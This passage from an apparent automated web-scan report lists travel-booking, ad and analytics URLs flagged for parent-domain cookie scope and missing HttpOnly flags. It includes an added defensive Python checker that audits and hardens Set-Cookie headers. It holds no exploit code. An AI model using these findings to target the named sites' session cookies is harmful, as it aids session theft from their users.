13.114. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.115. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

13.116. http://rs.gwallet.com/r1/pixel/x1743

13.117. http://rs.gwallet.com/r1/pixel/x914r7675757

13.118. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.119. http://sales.liveperson.net/hc/15744040/

13.120. http://servedby.flashtalking.com/click/1/16628

13.121. http://servedby.flashtalking.com/imp/1/16628

13.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.132. http://tag.contextweb.com/TagPublish/GetAd.aspx

13.133. http://tap.rubiconproject.com/oz/feeds/targus/profile

13.134. http://tap.rubiconproject.com/oz/sensor

13.135. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

13.136. http://travel.travelocity.com/hotel/HotelAvailability.do

13.137. http://travel.travelocity.com/hotel/HotelCobrand.do

13.138. http://travel.travelocity.com/hotel/HotelDetail.do

13.139. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

13.140. http://travela.priceline.com/sharedapps/scs

13.141. http://u.openx.net/w/1.0/sc

13.142. http://user.lucidmedia.com/clicksense/user

13.143. http://uxm.thousandeyes.com/rest/json

13.144. http://vitamine.networldmedia.net/bts/generic14.php

13.145. http://www.agoda.com/partners/partnersearch.aspx

13.146. http://www.booking.com/general.en-us.html

13.147. http://www.booking.com/hotel/us/c-boston-massachusettes.html

13.148. http://www.booking.com/hotel/us/copley-square.en-us.html

13.149. http://www.booking.com/index.en-us.html

13.150. http://www.booking.com/logo

13.151. http://www.booking.com/searchresults.html

13.152. http://www.cheaptickets.com/shop/hotelsearch

13.153. http://www.expedia.com/Hotel-Search

13.154. http://www.expedia.com/TripPreferences

13.155. http://www.expedia.com/daily/common/mscookie.aspx

13.156. http://www.expedia.com/pubspec/scripts/eap.asp

13.157. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

13.158. http://www.hotels.com/PPCHotelDetails

13.159. http://www.hotels.com/PPCSearch

13.160. http://www.hotels.com/compare/hotel_dockingbar.html

13.161. http://www.hotels.com/hotel/details.html

13.162. http://www.hotels.com/hotel/hoteldata.html

13.163. http://www.hotels.com/hoteldetails/urgencypopup.html

13.164. http://www.hotels.com/html/blank.html

13.165. http://www.hotels.com/html/tealeaf.html

13.166. http://www.hotels.com/search.do

13.167. http://www.hotels.com/search/search.html

13.168. http://www.hotels.com/selectors/en_US/

13.169. http://www.orbitz.com/

13.170. http://www.orbitz.com/App/SubmitQuickSearch

13.171. http://www.orbitz.com/App/ViewDHTMLCalendar

13.172. http://www.orbitz.com/App/ViewFlightSearchResults

13.173. http://www.orbitz.com/shop/hotelsearch

13.174. http://www.tumri.net/ads/ads

13.175. http://www.wtp101.com/f

13.176. http://www.wtp101.com/pixel

13.177. http://www.wtp101.com/pull_sync

13.178. http://www.wtp101.com/push_sync

13.179. http://www9.effectivemeasure.net/v4/em_js
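
Sections 9, 13 and 14 are all Set-Cookie attribute findings: a cookie issued over HTTPS without `Secure`, a cookie whose `Domain` attribute reaches a parent of the host that set it, and a cookie readable from script because `HttpOnly` is absent. The checker below is an added example for this page, not the scanner's implementation: it parses one Set-Cookie header, reports the three conditions under the same finding names the report uses, and emits a hardened header (host-only, `Secure` on HTTPS, `HttpOnly`). The sample headers are constructed with example.com hosts and made-up values, not captured responses.

```python
"""Added example: audit Set-Cookie headers for the Secure, HttpOnly and
Domain-scope findings listed in this report, and emit a hardened header.
Illustrative code for this page, not the scanner's own implementation;
the sample headers below are constructed, not captured.
"""

CANONICAL = {
    "path": "Path", "domain": "Domain", "expires": "Expires", "max-age": "Max-Age",
    "secure": "Secure", "httponly": "HttpOnly", "samesite": "SameSite",
}


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header into name, value and a lower-cased attribute map.

    Attribute names are case-insensitive (RFC 6265); flag attributes such as
    Secure and HttpOnly carry no value and are stored as True.
    """
    pieces = [p.strip() for p in header.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookie(header: str, request_scheme: str, request_host: str) -> tuple:
    """Return (cookie_name, [issue strings]) using the report's finding names."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    issues = []
    if request_scheme == "https" and "secure" not in attrs:
        # Without Secure the browser will also send the cookie over plain http://.
        issues.append("SSL cookie without secure flag set")
    if "httponly" not in attrs:
        # Readable via document.cookie, so any XSS on the origin can exfiltrate it.
        issues.append("Cookie without HttpOnly flag set")
    domain = attrs.get("domain")
    if isinstance(domain, str):
        # RFC 6265: a leading dot is ignored; the cookie matches the domain and all subdomains.
        scope = domain.lstrip(".").lower()
        host = request_host.lower()
        if scope != host and host.endswith("." + scope):
            issues.append(f"Cookie scoped to parent domain ({scope})")
        elif scope != host:
            # Browsers reject cookies whose Domain does not cover the request host.
            issues.append(f"Domain={scope} does not cover {host}; browsers reject the cookie")
    return cookie["name"], issues


def hardened_set_cookie(header: str, request_scheme: str) -> str:
    """Rewrite the header: drop Domain (host-only cookie), add Secure on HTTPS, add HttpOnly."""
    cookie = parse_set_cookie(header)
    attrs = {k: v for k, v in cookie["attrs"].items() if k != "domain"}
    if request_scheme == "https":
        attrs["secure"] = True
    attrs["httponly"] = True
    out = [f"{cookie['name']}={cookie['value']}"]
    for key, val in attrs.items():
        label = CANONICAL.get(key, key)
        out.append(label if val is True else f"{label}={val}")
    return "; ".join(out)


# Constructed (scheme, host, Set-Cookie) triples; not captured traffic.
SAMPLE_RESPONSES = [
    ("https", "secure.example.com", "JSESSIONID=8A7F0E11C2B3D4E5F6A7B8C9D0E1F2A3; Path=/"),
    ("https", "secure.example.com", "SESSION=abc123; Path=/; Secure; HttpOnly"),
    ("http", "www.example.com",
     "prefs=en_US; Domain=.example.com; Path=/; Expires=Sat, 02 Oct 2021 21:15:06 GMT"),
    ("http", "www.example.com", "tracker=xyz; Domain=other.example.net; Path=/; HttpOnly"),
]


def audit_all(responses) -> dict:
    """Map cookie name to its issue list for every (scheme, host, header) triple."""
    return {name: issues for name, issues in
            (audit_set_cookie(h, s, host) for s, host, h in responses)}


if __name__ == "__main__":
    for scheme, host, header in SAMPLE_RESPONSES:
        name, issues = audit_set_cookie(header, scheme, host)
        print(f"{name}: {issues or 'ok'}")
        if issues:
            print(f"  fixed: {hardened_set_cookie(header, scheme)}")
```

Omitting `Domain` is the safe default: RFC 6265 then makes the cookie host-only, so a cookie set by `secure.example.com` is never presented to `www.example.com` or any other sibling. For the third-party ad and analytics hosts in section 13 a parent-domain scope is often intentional (cross-subdomain tracking), so triage those separately from the booking-site session cookies, where the same attribute lets any compromised subdomain read or overwrite the session.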

14. Cookie without HttpOnly flag set

14.1. http://ads.adxpose.com/ads/ads.js

14.2. http://afe.specificclick.net/

14.3. http://aon.com/

14.4. http://as00.estara.com/fs/rules.php

14.5. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

14.6. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

14.7. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

14.8. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

14.9. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

14.10. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

14.11. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

14.12. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

14.13. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

14.14. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

14.15. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

14.16. http://event.adxpose.com/event.flow

14.17. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

14.18. http://go.americanexpress-travel.com/hotel/HotelCobrand.do

14.19. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

14.20. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

14.21. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

14.22. http://hotelplanner.com/

14.23. http://hublotnation.com/

14.24. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.25. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.26. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.27. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.28. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.29. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.30. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.31. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.32. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5634a7f054ba3498f73914ebeb4a7b43817e4a18fdd93098342a6389f2866e08f3e2e75638d737d198594ecd0cb755bca9cf478e40640a4400dacda9d56d8e247c53b46449047ebc45b62d489ac921adcd1b2097f4226a4de10944e8169319c042664cece1cf1de9bc4844c947cbb2366e05715c017443ba29ce8751730be12d1255f915ab3b50ca55b9ce8187d9ecf1da2246ca847d1bf13bf5dc051b6546dbf2d4dad7e8c1acc3530e9f11df75ceb12cc34353b784491f7c1e2cf3d6cc6e3bc92db9afadca8b91f3645e7d7cac0890b131adf1666129b04db5b02237cdf5fc14fb6a2a5e043dc564b12bd3a620b252d8d3613373433f6b9797f933b28413e12012614aff95f89c5f2a321a556699232da5557002622ffeeaf331e5a1517ef7dd8ebcbf314c51f4d9ac13351a216800c1db0659fa269bbc251edd7f5315d5879ad3e01d0bd06

14.33. http://ots.optimize.webtrends.com/ots/ots/js-3.[…]

14.34. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b94
28d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb

14.35. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5725a79065efa59d13f9854b8ffb4ff341cffa3c6c9da58c217b271a6094a91e104586061876c763ee9b299bde51a0fdfcafe22b51b43b81151e38bd553d9ab12d86842469408e2c25235d69ff48909d6a1a40767224ad1f142eb09b156138703056de3ff2bcdf6bfed885ff56d970342c76a45c00c442ea6aafb451028e858ac6409ca0ea7ba1aa3549cfe1f7c9fcb1eb83a6dac42c0a61ffc049613d21d3baf2c09e51a9d1cda3830fff136da5cfa5d813450463c1ecda7d2e9d53971c4e5be8dd29cf8d8aab3083f4ee0cececa81041e15c81f6d158200d1530d2e73c856ca48afa6bef559bb3f1057f274626e5869d7695f243e3ff6a47b6697323f483515143f0fc99e12cb8abda344d8123fd373a73000456974ff8bd27744065c04e26ad0fcc2f813dc1b5a92d77e13e144dd4f11e933a595458fb03eedba83077f2a47f279e6f61b6874486c0577b8e5

14.36. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.37. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d92
76d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd

14.38. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18

14.39. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c7
22d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5

14.40. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.41. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.42. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.43. http://ots.optimize.webtrends.com/ots/ots/js-3.…

14.44. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec4
